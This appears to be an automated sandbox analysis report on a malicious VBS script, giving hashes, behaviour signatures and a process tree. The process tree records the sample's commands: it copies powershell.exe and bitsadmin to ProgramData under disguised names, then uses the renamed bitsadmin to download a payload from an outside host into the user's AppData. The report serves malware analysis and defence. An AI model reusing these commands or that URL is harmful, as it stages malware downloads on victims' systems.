Analysis
-
max time kernel
45s -
max time network
51s -
platform
windows7_x64 -
resource
win7-20220331-en -
submitted
28-03-2022 01:21
Static task
static1
Behavioral task
behavioral1
Sample
c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52.vbs
Resource
win7-20220331-en
General
-
Target
c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52.vbs
-
Size
6KB
-
MD5
11f6b0f1a90680ea7f7d57b68ff305ee
-
SHA1
b1793a0401e017b90f8dea32bdf4d27c1af82fae
-
SHA256
c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52
-
SHA512
69f219dc9b61146447850a802c31bbaf10f2b8624418dcf12bfdfcf6bf116c5d68c1d2fea79f3f4afa533b9f0134c7d911863a3d61816aecab58a1b4e1950e7a
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
KFJYTohin.exepid process 1752 KFJYTohin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.execmd.exedescription pid process target process PID 528 wrote to memory of 1680 528 WScript.exe cmd.exe PID 528 wrote to memory of 1680 528 WScript.exe cmd.exe PID 528 wrote to memory of 1680 528 WScript.exe cmd.exe PID 1680 wrote to memory of 1340 1680 cmd.exe cmd.exe PID 1680 wrote to memory of 1340 1680 cmd.exe cmd.exe PID 1680 wrote to memory of 1340 1680 cmd.exe cmd.exe PID 1680 wrote to memory of 1248 1680 cmd.exe cmd.exe PID 1680 wrote to memory of 1248 1680 cmd.exe cmd.exe PID 1680 wrote to memory of 1248 1680 cmd.exe cmd.exe PID 528 wrote to memory of 1752 528 WScript.exe KFJYTohin.exe PID 528 wrote to memory of 1752 528 WScript.exe KFJYTohin.exe PID 528 wrote to memory of 1752 528 WScript.exe KFJYTohin.exe PID 528 wrote to memory of 1752 528 WScript.exe KFJYTohin.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zoZjp.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\KFJYToh*.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zoZjp.exe3⤵PID:1340
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\KFJYToh*.exe3⤵PID:1248
-
-
-
C:\ProgramData\KFJYTohin.exe"C:\ProgramData\KFJYTohin.exe" /transfer NEcBQb /download https://fhivelifestyle.online/lidepato/BRGDRD68M16L682M/uk.css C:\Users\Admin\AppData\Roaming\uk.css2⤵
- Executes dropped EXE
PID:1752
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
182KB
MD50920b14aa67a8b04acf48ffe7c6f0927
SHA13421124253058dc21453ebac531b67aeb999f627
SHA256838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00
SHA5122b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51
-
Filesize
182KB
MD50920b14aa67a8b04acf48ffe7c6f0927
SHA13421124253058dc21453ebac531b67aeb999f627
SHA256838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00
SHA5122b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51